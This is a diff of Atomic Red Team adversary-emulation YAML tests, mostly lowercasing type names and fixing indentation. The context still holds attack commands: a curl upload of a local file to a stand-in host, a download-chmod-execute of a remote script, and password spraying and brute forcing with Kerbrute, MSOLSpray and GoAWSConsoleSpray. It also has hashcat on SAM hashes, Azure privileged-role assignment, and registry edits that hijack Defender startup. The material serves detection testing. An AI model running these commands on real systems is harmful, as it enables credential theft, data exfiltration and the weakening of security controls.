$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
name: powershell
@@ -201,7 +201,7 @@ atomic_tests:
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged authentication administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to service principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
@@ -210,20 +210,20 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
service_principal_name:
description: Name of the service principal
type: String
type: string
default: SuperSP
role_name:
description: Name of the targed Azure AD role
type: String
default: Global Reader
type: string
default: Global Reader
dependencies:
- description: |
AzureAD module must be installed.
@@ -268,7 +268,7 @@ atomic_tests:
By default, the role Reader is assigned to user in this test.
New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
@@ -279,23 +279,23 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
user_principal_name:
description: Name of the targeted user (user principal)
type: String
type: string
default: SuperUser
role_name:
description: Name of the targed Azure role
type: String
type: string
default: Reader
subscription:
description: Name of the targed subscription
type: String
type: string
default: Azure subscription 1
dependencies:
- description: |
@@ -346,7 +346,7 @@ atomic_tests:
By default, the role Reader is assigned to service principal in this test.
New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
@@ -357,24 +357,24 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
service_principal_name:
description: Name of the service principal
type: String
type: string
default: SuperSP
role_name:
description: Name of the targed Azure role
type: String
default: Reader
type: string
default: Reader
subscription:
description: Name of the targed subscription
type: String
default: Azure subscription 1
type: string
default: Azure subscription 1
dependencies:
- description: |
Az.Resources module must be installed.
@@ -410,7 +410,7 @@ atomic_tests:
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
name: powershell
@@ -436,19 +436,19 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
application_name:
description: Name of the targed application
type: String
type: string
default: test_app
application_permission:
description: Permission from Microsoft Graph Resource API that will be add to application
type: String
type: string
default: DirectoryRecommendations.Read.All
dependencies:
- description: |
@@ -512,7 +512,7 @@ atomic_tests:
$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
name: powershell
elevation_required: false
- name: Password Change on Directory Service Restore Mode (DSRM) Account
@@ -521,11 +521,11 @@ atomic_tests:
description: |
Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account
supported_platforms:
- windows
- windows
input_arguments:
sync_account:
description: Account to sync password from
type: String
type: string
default: '%username%'
executor:
name: command_prompt
atomics/T1105/T1105.yaml
+131 -131
View File
@@ -11,19 +11,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Remote path to receive rsync
type: Path
type: path
default: /tmp/victim-files
remote_host:
description: Remote host to copy toward
type: String
type: string
default: victim-host
local_path:
description: Path of folder to copy
type: Path
type: path
default: /tmp/adversary-rsync/
username:
description: User account to authenticate on remote host
type: String
type: string
default: victim
executor:
command: |
@@ -39,19 +39,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Path of folder to copy
type: Path
type: path
default: /tmp/adversary-rsync/
remote_host:
description: Remote host to copy from
type: String
type: string
default: adversary-host
local_path:
description: Local path to receive rsync
type: Path
type: path
default: /tmp/victim-files
username:
description: User account to authenticate on remote host
type: String
type: string
default: adversary
executor:
command: |
@@ -67,19 +67,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Remote path to receive scp
type: Path
type: path
default: /tmp/victim-files/
local_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-scp
remote_host:
description: Remote host to copy toward
type: String
type: string
default: victim-host
username:
description: User account to authenticate on remote host
type: String
type: string
default: victim
executor:
command: |
@@ -95,19 +95,19 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote host to copy from
type: String
type: string
default: adversary-host
local_path:
description: Local path to receive scp
type: Path
type: path
default: /tmp/victim-files/
remote_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-scp
username:
description: User account to authenticate on remote host
type: String
type: string
default: adversary
executor:
command: |
@@ -123,19 +123,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Remote path to receive sftp
type: Path
type: path
default: /tmp/victim-files/
local_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-sftp
remote_host:
description: Remote host to copy toward
type: String
type: string
default: victim-host
username:
description: User account to authenticate on remote host
type: String
type: string
default: victim
executor:
command: |
@@ -151,19 +151,19 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote host to copy from
type: String
type: string
default: adversary-host
local_path:
description: Local path to receive sftp
type: Path
type: path
default: /tmp/victim-files/
remote_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-sftp
username:
description: User account to authenticate on remote host
type: String
type: string
default: adversary
executor:
command: |
@@ -178,11 +178,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
type: path
default: Atomic-license.txt
executor:
command: |
@@ -199,11 +199,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
type: path
default: Atomic-license.txt
executor:
command: |
@@ -225,15 +225,15 @@ atomic_tests:
input_arguments:
bits_job_name:
description: Name of the created BITS job
type: String
type: string
default: qcxjb7
local_path:
description: Local path to place file
type: Path
type: path
default: '%temp%\Atomic-license.txt'
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
executor:
command: |
@@ -249,11 +249,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path:
description: Destination path to file
type: Path
type: path
default: $env:TEMP\Atomic-license.txt
executor:
command: |
@@ -270,7 +270,7 @@ atomic_tests:
input_arguments:
destination_path:
description: Path to create remote file at. Default is local admin share.
type: String
type: string
default: '\\localhost\C$'
executor:
command: |
@@ -311,11 +311,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to download
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Location to save downloaded file
type: Path
type: path
default: '%temp%\Atomic-license.txt'
dependencies:
- description: 'Must have a Windows Defender version with MpCmdRun.exe installed'
@@ -341,31 +341,31 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote hostname or IP address
type: String
type: string
default: localhost
remote_port:
description: Remote port to connect to
type: Integer
type: integer
default: 8443
output_file:
description: Path of file to save output to
type: Path
type: path
default: /tmp/T1105.whois.out
query:
description: Query to send to remote server
type: String
type: string
default: "Hello from Atomic Red Team test T1105"
timeout:
description: Timeout period before ending process (seconds)
type: Integer
type: integer
default: 1
dependencies:
- description: |
The whois and timeout commands must be present
prereq_command: |
which whois && which timeout
get_prereq_command: |
echo "Please install timeout and the whois package"
- description: |
The whois and timeout commands must be present
prereq_command: |
which whois && which timeout
get_prereq_command: |
echo "Please install timeout and the whois package"
executor:
name: sh
elevation_required: false
@@ -382,11 +382,11 @@ atomic_tests:
input_arguments:
target_remote_file:
description: File to download
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
output_file:
description: File to write to
type: String
type: string
default: LICENSE.txt
executor:
command: |
@@ -404,7 +404,7 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote hostname or IP address
type: String
type: string
default: localhost
executor:
name: command_prompt
@@ -447,24 +447,24 @@ atomic_tests:
input_arguments:
file_download:
description: File to download
type: String
type: string
default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
executor:
command: |
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
@@ -488,34 +488,34 @@ atomic_tests:
input_arguments:
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
remote_destination:
description: Remote destination
type: String
type: string
default: www.example.com
file_path:
description: File to upload
type: String
type: string
default: c:\temp\atomictestfile.txt
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
- description: |
A file must be created to upload
prereq_command: |
if (Test-Path #{file_path}) {exit 0} else {exit 1}
get_prereq_command: |
echo "This is an Atomic Test File" > #{file_path}
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
- description: |
A file must be created to upload
prereq_command: |
if (Test-Path #{file_path}) {exit 0} else {exit 1}
get_prereq_command: |
echo "This is an Atomic Test File" > #{file_path}
executor:
command: |
#{curl_path} -T #{file_path} #{remote_destination}
@@ -524,7 +524,7 @@ atomic_tests:
#{curl_path} --data #{file_path} #{remote_destination}
name: command_prompt
- name: Download a file with Microsoft Connection Manager Auto-Download
- name: Download a file with Microsoft Connection Manager Auto-Download
auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc
description: |
Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file.
@@ -536,14 +536,14 @@ atomic_tests:
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
supported_platforms:
- windows
- windows
input_arguments:
Path_to_file:
description: Path to the Batch script
type: Path
type: path
default: PathToAtomicsFolder\T1105\src\T1105.bat
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{Path_to_file} must exist on system.
prereq_command: |
@@ -574,11 +574,11 @@ atomic_tests:
default: $env:comspec
exe_remote_folder:
description: Path to store executable on remote machine (no drive letter)
type: String
type: string
default: \Windows\Temp\T1105.exe
remote_drive_letter:
description: Remote drive letter
type: String
type: string
default: C
dependency_executor_name: powershell
dependencies:
@@ -621,15 +621,15 @@ atomic_tests:
description: |
Create a ZIP file from a folder in a remote drive
supported_platforms:
- windows
- windows
input_arguments:
Path_unc:
description: Path to the UNC folder
type: Path
type: path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\
Path_PrintBrm:
description: Path to PrintBrm.exe
type: Path
type: path
default: C:\Windows\System32\spool\tools\PrintBrm.exe
executor:
command: |
@@ -645,18 +645,18 @@ atomic_tests:
Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
supported_platforms:
- windows
- windows
input_arguments:
replace_cab:
description: Path to the cab file
type: Path
default: PathToAtomicsFolder\T1105\src\redcanary.cab
type: path
default: PathToAtomicsFolder\T1105\src\redcanary.cab
Path_replace:
description: Path to replace.exe
type: Path
type: path
default: C:\Windows\System32\replace.exe
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{replace_cab} must exist on system.
prereq_command: |
@@ -678,15 +678,15 @@ atomic_tests:
Copy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
supported_platforms:
- windows
- windows
input_arguments:
replace_cab:
description: UNC Path to the cab file
type: Path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab
type: path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab
Path_replace:
description: Path to replace.exe
type: Path
type: path
default: C:\Windows\System32\replace.exe
executor:
command: |
@@ -704,7 +704,7 @@ atomic_tests:
input_arguments:
local_path:
description: Local path to place file
type: String
type: string
default: '%temp%\Atomic-license.txt'
remote_file:
description: URL of file to copy
@@ -723,10 +723,10 @@ atomic_tests:
input_arguments:
vbscript_file:
description: Full path to the VisualBasic downloading the file
type: String
type: string
default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{vbscript_file} must be exist on system.
prereq_command: |
@@ -743,16 +743,16 @@ atomic_tests:
description: |
Utilize linux Curl to download a remote file, chmod +x it and run it.
supported_platforms:
- linux
- linux
input_arguments:
remote_url:
description: url of remote payload
type: string
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
payload_name:
description: payload name
type: string
default: atomic.sh
default: atomic.sh
executor:
command: |
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
@@ -768,15 +768,15 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path:
description: Destination path to file
type: Path
type: path
default: $env:TEMP\Atomic-license.txt
local_nimgrab:
description: Local path to nimgrab
type: Path
type: path
default: $env:TEMP\nimgrab.exe
executor:
command: |
@@ -784,32 +784,32 @@ atomic_tests:
cleanup_command: |
del #{destination_path} >nul 2>&1
name: command_prompt
dependency_executor_name: powershell
dependencies:
- description: |
NimGrab must be installed on system.
prereq_command: |
if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force
Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
Remove-Item $env:temp\nim
Remove-Item $env:temp\nim.zip
- name: iwr or Invoke Web-Request download
dependency_executor_name: powershell
dependencies:
- description: |
NimGrab must be installed on system.
prereq_command: |
if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force
Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
Remove-Item $env:temp\nim
Remove-Item $env:temp\nim.zip
- name: iwr or Invoke Web-Request download
auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
description: |
description: |
Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
type: path
default: '%temp%\Atomic-license.txt'
executor:
command: |
atomics/T1106/T1106.yaml
+4 -4
View File
@@ -9,14 +9,14 @@ atomic_tests:
input_arguments:
source_file:
description: Location of the CSharp source file to compile and execute
type: Path
type: path
default: PathToAtomicsFolder\T1106\src\CreateProcess.cs
output_file:
description: Location of the payload
type: Path
type: path
default: '%tmp%\T1106.exe'
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{source_file} must exist on system.
prereq_command: |
atomics/T1110.001/T1110.001.yaml
+13 -13
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
user:
description: Account to bruteforce
type: String
type: string
default: '%username%'
executor:
name: command_prompt
@@ -31,19 +31,19 @@ atomic_tests:
input_arguments:
user:
description: Account to bruteforce
type: String
type: string
default: $ENV:USERNAME
passwords_path:
description: List of passwords we will attempt to brute force with
type: Path
type: path
default: PathToAtomicsFolder\T1110.001\src\passwords.txt
domain:
description: Active Directory domain FQDN
type: String
type: string
default: $env:UserDnsDomain
auth:
description: authentication method to choose between "NTLM" and "Kerberos"
type: String
type: string
default: NTLM
executor:
name: powershell
@@ -81,11 +81,11 @@ atomic_tests:
input_arguments:
username:
description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@<valid_ms_account.com>"
type: String
type: string
default: bruce.wayne@contoso.com
passwords:
description: List of passwords we will attempt to brute force with
type: String
type: string
default: Password1`n1q2w3e4r`nPassword!
dependency_executor_name: powershell
dependencies:
@@ -125,7 +125,7 @@ atomic_tests:
If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -152,7 +152,7 @@ atomic_tests:
description: |
Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -165,7 +165,7 @@ atomic_tests:
get_prereq_command: |
yum -y update && yum install -y openssl sudo
executor:
elevation_required: true
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
su target
@@ -189,18 +189,18 @@ atomic_tests:
name: sh
- name: Password Brute User using Kerbrute Tool
auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
description: |
description: |
Bruteforce a single user's password from a wordlist
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
type: string
default: $ENV:userdnsdomain
domain:
description: Domain where you will be testing
type: String
type: string
default: $ENV:userdomain
dependency_executor_name: powershell
dependencies:
atomics/T1110.002/T1110.002.yaml
+3 -3
View File
@@ -9,15 +9,15 @@ atomic_tests:
input_arguments:
hashcat_exe:
description: Path to Hashcat executable
type: String
type: string
default: '%temp%\hashcat6\hashcat-6.1.1\hashcat.exe'
input_file_sam:
description: Path to SAM file
type: String
type: string
default: PathToAtomicsFolder\T1110.002\src\sam.txt
input_file_passwords:
description: Path to password list
type: String
type: string
default: PathToAtomicsFolder\T1110.002\src\password.lst
dependency_executor_name: powershell
dependencies:
atomics/T1110.003/T1110.003.yaml
+31 -31
View File
@@ -18,7 +18,7 @@ atomic_tests:
input_arguments:
password:
description: The password to try for each user in users.txt
type: String
type: string
default: Spring2020
dependencies:
- description: |
@@ -39,11 +39,11 @@ atomic_tests:
https://github.com/dafthack/DomainPasswordSpray
supported_platforms:
- windows
- windows
input_arguments:
domain:
description: Domain to brute force against
type: String
type: string
default: $Env:USERDOMAIN
executor:
name: powershell
@@ -62,15 +62,15 @@ atomic_tests:
input_arguments:
password:
description: single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
type: String
type: string
default: P@ssw0rd!
domain:
description: Domain FQDN
type: String
type: string
default: $env:UserDnsDomain
auth:
description: authentication method to choose between "NTLM" and "Kerberos"
type: String
type: string
default: NTLM
executor:
name: powershell
@@ -102,7 +102,7 @@ atomic_tests:
}
}
Write-Host "End of password spraying"
- name: Password spray all Azure AD users with a single password
- name: Password spray all Azure AD users with a single password
auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
description: |
Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
@@ -112,15 +112,15 @@ atomic_tests:
input_arguments:
password:
description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
type: String
type: string
default: P@ssw0rd!
valid_username:
description: Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg <valid_test_user>@<valid_ms_account.com>
type: String
type: string
default: bruce.wayne@contoso.com
valid_password:
description: Valid password to authenticate as valid_username in the <valid_ms_account>
type: String
type: string
default: iamthebatman
dependency_executor_name: powershell
dependencies:
@@ -176,15 +176,15 @@ atomic_tests:
This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually
or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.
supported_platforms:
- windows
- windows
input_arguments:
user_limit:
description: The max number of users to put in the list when running the prereq_command
type: Integer
type: integer
default: 200
password:
description: The password to try for each user in users.txt
type: String
type: string
default: Spring2020
dependencies:
- description: |
@@ -233,11 +233,11 @@ atomic_tests:
input_arguments:
password:
description: Single password to try against the list of user accounts
type: String
type: string
default: P@ssword1
user_list:
description: File path to list of users (one per line, formatted as user@subdomain.onmicrosoft.com)
type: String
type: string
default: $env:temp\T1110.003UserList.txt
dependency_executor_name: powershell
dependencies:
@@ -255,18 +255,18 @@ atomic_tests:
Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
- name: Password Spray using Kerbrute Tool
auto_generated_guid: c6f25ec3-6475-47a9-b75d-09ac593c5ecb
description: |
description: |
Test a single password against a list of users
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
type: string
default: $ENV:userdnsdomain
domain:
description: Domain where you will be testing
type: String
type: string
default: $ENV:userdomain
dependency_executor_name: powershell
dependencies:
@@ -297,22 +297,22 @@ atomic_tests:
input_arguments:
aws_account_id:
description: ID of the AWS account
type: String
type: string
default: "XXXXXXXX"
dependencies:
- description: |
Check if go is installed
prereq_command: |
go version
get_prereq_command: |
echo Install GO
- description: |
Check if go is installed
prereq_command: |
go version
get_prereq_command: |
echo Install GO
executor:
command: |
cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
cleanup_command: |
rm -rf /tmp/GoAWSConsoleSpray
rm -rf /tmp/GoAWSConsoleSpray
name: sh
elevation_required: false
elevation_required: false
atomics/T1110.004/T1110.004.yaml
+21 -22
View File
@@ -1,4 +1,3 @@
---
attack_technique: T1110.004
display_name: 'Brute Force: Credential Stuffing'
@@ -9,22 +8,22 @@ atomic_tests:
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- linux
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
type: string
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
executor:
name: bash
@@ -39,23 +38,23 @@ atomic_tests:
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- macos
- macos
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
type: string
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
executor:
name: bash
@@ -66,18 +65,18 @@ atomic_tests:
- name: Brute Force:Credential Stuffing using Kerbrute Tool
auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde
description: |
description: |
Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
type: string
default: $ENV:userdnsdomain
domain:
description: Domain where you will be testing
type: String
type: string
default: $ENV:userdomain
dependency_executor_name: powershell
dependencies:
@@ -93,7 +92,7 @@ atomic_tests:
if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1}
get_prereq_command: |
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt"
executor:
executor:
name: powershell
elevation_required: false
command: |
atomics/T1112/T1112.yaml
+11 -11
View File
@@ -25,7 +25,7 @@ atomic_tests:
input_arguments:
new_executable:
description: New executable to run on startup instead of Windows Defender
type: String
type: string
default: calc.exe
executor:
command: |
@@ -62,7 +62,7 @@ atomic_tests:
input_arguments:
bad_domain:
description: Domain to add to trusted site zone
type: String
type: string
default: bad-domain.com
executor:
command: |
@@ -99,7 +99,7 @@ atomic_tests:
input_arguments:
default_execution_policy:
description: Specify the default poweshell execution policy
type: String
type: string
default: Default
executor:
command: |
@@ -225,7 +225,7 @@ atomic_tests:
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable Windows LogOff Button
- name: Disable Windows LogOff Button
auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
description: |
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
@@ -343,7 +343,7 @@ atomic_tests:
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
- name: Activate Windows NoClose Group Policy Feature
auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723
description: |
@@ -358,7 +358,7 @@ atomic_tests:
cleanup_command: |
